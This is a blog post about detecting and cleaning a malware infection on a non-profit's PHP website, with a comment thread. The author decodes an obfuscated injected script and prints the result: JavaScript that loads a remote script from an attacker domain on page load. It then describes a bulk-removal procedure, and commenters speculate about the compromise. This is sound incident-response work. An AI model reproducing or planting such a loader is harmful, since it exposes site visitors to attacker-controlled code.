Website Virus Detection


Today, I officially become the webmaster of a non-profit organization. Their website was shut down by the hosting company, because they found malware or virus on the website.

This is actually the first time I encountered such an issue. We called the hosting company, and asked them if they knew where the virus was from, and how we got infected? The technical support person told us that the virus was detected by their system, but they don’t know where exactly it was. He mentioned a few common issues they knew, such as a change of the .htaccess file, an iframe added to one of our pages, or a SQL injection into our database, and suggested us to download the code and scan it through an Anti-Virus software.

The first thing I did is checking the .htaccess, and I only find code to redirect the site to the generic access denied page from the hosting site. I guessed if there were any malicious code in that file, it has been cleaned, which is good over all, but not good for tracing the virus.

Next, I downloaded the site, and ran it through Norton Anti-Virus first, but I found nothing. I ran it through another software called MalwareBytes’ Anti-Malware, hoping to find a malware, for which the name of the software suggested that it’s good. I found nothing either.

I searched google using key word “Website, Virus”, and find a link about website being attacked by having java scripts inserted into each page, that calls a php page from another website. I tried to find out if it’s the same senario for our website by searching “http://” on all of our pages, and I found all references valid.

It’s been two hours and I’m still in a middle of nowhere, and I found the following piece of code at the end of our index.php file. I copied the code to a note pad and here’s a screenshot of it.

It’s really hard to figure out what it does, but when code is written in such a bad format, it can’t be anything good. I copied the code into a script editor, and tried to decode it. I slowed figured out that there is a function O(Cp, I) defined in this spagetti code, that is used to encode strings. I wrote a separate java script to get all the variables assigned by function O, and O yeah, I decoded the following words:

appendChild
/autohome.com.cn/autohome.com.cn/39.net/google.com/btjunkie.org.php
8080
body
createElement
http: //sun-com.ifolder.ru.fanpop-com.cybertagonline.ru:
setAttribute
onload

In the end, it’s not hard to figure out what it was doing.

/*
window["onload"] = function()
{
    var element = document.createElement("script");
    element.src = "http://sun-com.ifolder.ru.fanpop-com.cybertagonline.ru:8080/autohome.com.cn/autohome.com.cn/39.net/google.com/btjunkie.org.php";
    element.setAttribute("defer", "1");
    document.body.appendChild(element);

};
*/

It’s loading a php page from a Russian webiste whenever the home page of this organization is visited. I detected three files that have the code inserted. I still need to do a compare of the site with an old version before I request the site to be restored.

I still need to find out how the code was able to be inserted into our pages, and mend the security flaws if there are any, but so far, I think I really deserve some beers.

————– 3/29/2010 Update —————–

The code was inserted into every index.php file and every .js file on the site. First I tried to delete them manually, but the script still popped up when I visited a certain page. I read through the code, and found a sub folder used by a third party component that has about 10 subfolders in it, and within each there are 3 to 10 javascripts. There’s no way I could clean them all by hand, so I downloaded all code to my local machine, and decided to do a bulk replacement by Microsoft Visual Studio. (Yeah, mostly I’m a .NET guy, and I know this is an overkill.) Here are the procedures:

  1. File -> Open -> Website, and on the popped up File System screen, select the root folder of the affected website.
  2. Visual Studio will ask you whether you want to convert the website to a newer .NET version. Select No, cause we don’t want to compile it in.NET at all.
  3. Edit -> Find and Replace ->Replace in Files, put in the malicious script in Find What text box, leave Replace With text box empty, and select Entire Solution.
  4. Click Replace All button, Visual Studio will do all the dirty job for you.
  5. After it’s done, save all files. You probably want to test everything on your local machine, and upload the site after everything worked fine.

I only use gPHPEdit and BlueFish in Linux for PHP editing, and neither can do what I did with Visual Studio, so I can’t comment on what tools you can use to do bulk replacement, but I’m sure the ones that you can use to create a project should have the Replace All in Project feature.

Fight the Virus, and happy coding!

Advertisements

10 comments

  1. hi my site has been infected too. What it does is to insert a code at the end of every index.php & html & also all files with .jd extension. I already remove the codes from the infected files but I still see the russian site loading in my browser status bar. Let me know if you find a removal tool. thanks

    1. Hi Julio,

      Thanks for visiting my site. I had the same headache when I tried to clean the scripts manually. They still popped up when I visited a certain page. I read through the code, and found a sub folder used by a third party component that has about 10 subfolders in it, and within each there are 3 to 10 javascripts. There’s no way I could clean them all by hand, so I downloaded all code to my local machine, and decided to do a bulk replacement by Microsoft Visual Studio. If you have that tool, you can read my blog for the procedures on how to clean them up.

      I only use gPHPEdit and BlueFish in Linux for PHP editing, and neither can do what I did with Visual Studio, so I can’t comment on what tools you can use to do bulk replacement, but I’m sure the ones that you can use to create a project should have the Replace All in Project feature.

  2. My site is also infected with the same thing. It places a JS in all index and js files. I delete all manually and the site will be ok for next 10days and later it gets infected again. I have 5 websites in my account and all the 5websites get infected. I cant find out the backhole. Still struggling to get it out.
    How do you come to conclusion that the third party component is generating it.

    1. Hi Binu, thanks for sharing your experience here. Well, we built the pages ourselves, and of course we didn’t write this so it must be generated and inserted by a third party. Actually our hosting company has some scanning tools and find out about the virus, and disabled our site, so it will not affect other sites they host. I believe, although not 100% sure, that it’s some PHP security hole that gave the hackers your admin login and password. The reason I think this way is because not only files in publich_html, but also all js and index files in your home folder are affected. The only way to get that done is getting your admin password. So,

      Step 1: Change your admin password.
      Step 2: Upgrade PHP to the latest version.

  3. Thanks for your reply.
    Even my ASP.net sites are also affected. I am running on windows IIS7 server. I use Notepad++ to find and replace script in all the files in a folder.

    Are you talking about the FTP password.
    The only PHP app i am using is Vbulletin forum. all other are asp and asp.net files.

    1. Hmm, for Windows server, I think probably the FTP login has been compromised. I’m not familiar with VBulletin. You can search it to see if anyone posted any security issues with it.

  4. Hello there I am so grateful I found your blog, I really found you by mistake,
    while I was looking on DuckDuckGo for something else, Nonetheless I am here now and would just like to
    say thank you for a incredible post and a all round interesting blog (I also love the theme/design), I don’t
    have time to read through it all at the minute but I have bookmarked it and also included your
    RSS feeds, so when I have time I will be back to read
    a lot more, Please do keep up the excellent jo.

  5. If the desired domain is registered already then check the Whois details in
    network solutions for the registered owner details.
    Use your actual dba (Doing Business As) and physical address.
    ” POP mailboxes and web mail services: The use of the POP mailboxes is important and this is the reason it is best to use it to offer every departments and staff a different email id.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s